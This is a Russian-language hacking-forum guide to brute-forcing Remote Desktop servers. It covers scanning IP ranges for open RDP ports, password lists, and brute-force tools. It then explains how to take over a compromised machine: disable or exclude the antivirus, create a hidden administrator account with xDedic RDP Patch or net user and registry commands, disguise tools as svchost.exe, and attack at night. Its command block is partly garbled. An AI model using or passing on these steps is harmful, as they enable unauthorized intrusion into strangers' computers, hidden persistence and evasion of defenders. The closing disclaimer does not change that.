Гайд по бруту дедиков .
Дедик - это удалённый пк, к которому можно подключиться с помощью стандартной программы Windows "mstsc.exe". Подключиться получиться, если на пк открыт определённый порт, вводимый нами при подключении. На дедике можно делать всё, что душе угодно(но лучше не надо, читай дальше).
Итак, что же потребуется для брута дедиков?
- IP-диапазоны нужной страны или города.
- Cканер ip-диапазонов (masscan, vncscan, xDedic IP scanner , tcp port scanner)
- Два текстовых файла - возможные логины и пароли.
- Программа для подбирания учёток из ваших логинов и паролей. Т.е прога для, собственно, брута (лучший вариант для поиска новых пк - NLBrute 1.2)
- xDedic RDP Patch для создания скрытой учётки на дедике. Или набор команд для "cmd.exe"
Диапазоны по городу можно взять отсюда - 4it.me, есть очень точная база России. А также, можно скачать программу IP-city и взять оттуда (обновил для вас списки ip в ней). Скачать , VirusTotal, HybridAnalysis
Как получить ip-диапазоны:
Для обновления списков скачайте GeoLite Country CSV/ZIP и GeoLite City CSV/ZIP отсюда. Затем распакуйте csv файлы в папку с программой.
2. Я рассмотрю все самые лучшие программы для скана ip-диапазонов и какой подойдёт лучше для вас.
https://www.sendspace.com/file/z7ek8u - Скачать
Буду использовать GUI, так как в ней тот же функционал, что и в консольной версии.
Вставляем ip-диапазоны. Дальше прописываем порты. Стандартный порт - 3389.
Окно со сканированием закроется само (не должно закрываться сразу).
192.168.1.1(от балды), а 192.168.1.1:3456.
Скачать программу. VirusTotal. HybridAnalysis.
Буду использовать опять GUI, так как в ней тот же функционал, что и в консольной версии.
Скачать программу. VirusTotal.
Упрощённая версия сканера ip-диапазонов.
Спойлер: Tcp Port Scanner , если у вас пк подключён напрямую к внешнему роутеру (очень быстрый)
Скачать. VirusTotal.
Использует новую технологию сканирования, благодаря подключению пк напрямую к выходящему в глобальную сеть роутеру.
Жмём options и делаем, как на скриншоте
Там, где надо прописать порты, пишем 3389 - стандартный порт RDP.
Жмём "Start scan" и ждём результатов.
3350-3500,139, 4899,5900,4444.
Разъясню, за что какой порт отвечает простыми словами.
3350 - 3500 - просто стандартное подключение по "mstsc.exe". 139 - подключение к ftp серверу (имеем доступ к данным хард диска). 4899 - использует программа RAdmin. 5900 - vnc подключение (подробнее, тут https://habrahabr.ru/post/76343/).
4444 - червь W32.Blaster.Worm
После сканирования можете проверить на подключение RDP программой rdp solid scanner v2.1. Это уменьшит кол-во мусора в разы.
3. Логины.
Для брута подойдут типичные логины (не делайте их слишком много, до конца жизни будете брутить
Логоны Administator на разных языках
https://pastebin.com/skbXm8je
Пароли.
Вот они уже зависят от регистра. Вот список самых частых паролей. Не делайте их тоже слишком много (максимум 1 мегабайт).
4.
Ставим настройки, советую, если мощный пк, ставить вот так (даже не грузит проц)
Убираем галку с пункта "Servers checking" (обязательно). И во вкладке "BRUTE" жмём Start. После закрытия программы можно нажать Continue!
Good count - количество наших дедиков! Сохраняется в файле "good.txt".
5. Вот и нашёлся первый дедик.
Способ для новичков:
Подключаемся, входим в систему. Далее проверяем наличие антивируса, если его нет - отлично, если есть, добавляем папку Название диска: \Windows - в исключения. Создаём там папку (не слишком палевное название, например, "Check"). Скачиваем xDedicRDPPatch - отсюда на свой пк, затем жмём "копировать", переключаемся на "mstsc.exe" и жмём "вставить" в созданную папку. Запускаем от имени администратора! Если напротив надписи RdpPatch - no, то ставим галку "Patch RDP". Ставим галку "Self delete and logout". Пишем свои будущие логин и пароль (будете использовать в дальнейшем только их). Патчим! Нас отключило, теперь заходим ещё раз, но используя свои логин и пароль. Пользуемся. Способ для прошаренных (команды в cmd, для русской версии windows, замените ВАШЛОГИН и ВАШПАРОЛЬ на желаемые):
net user ВАШ_ЛЛОГИН ВАШРОЛЬ /add net localgroup Администраторы ВАШ_ЛОГЛОГИН /add net localgroup "Пользователи удаленного рабочего стола" ВАШЛЬ /add reg add "HKEY_LOCALLOCALE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШ_ЛОГИН /ЛОГИН /t REG 0 /fВсе программы храните в системных папках. Называйте их "svchost.exe" или "system.exe". Если дедик включён круглосуточно, то брутьте ночью, админы спят
В браузере используйте инкогнито и так далее.
Взято из открытых источников. Мы ни к чему не призываем. Вся информация носит ознакомительный характер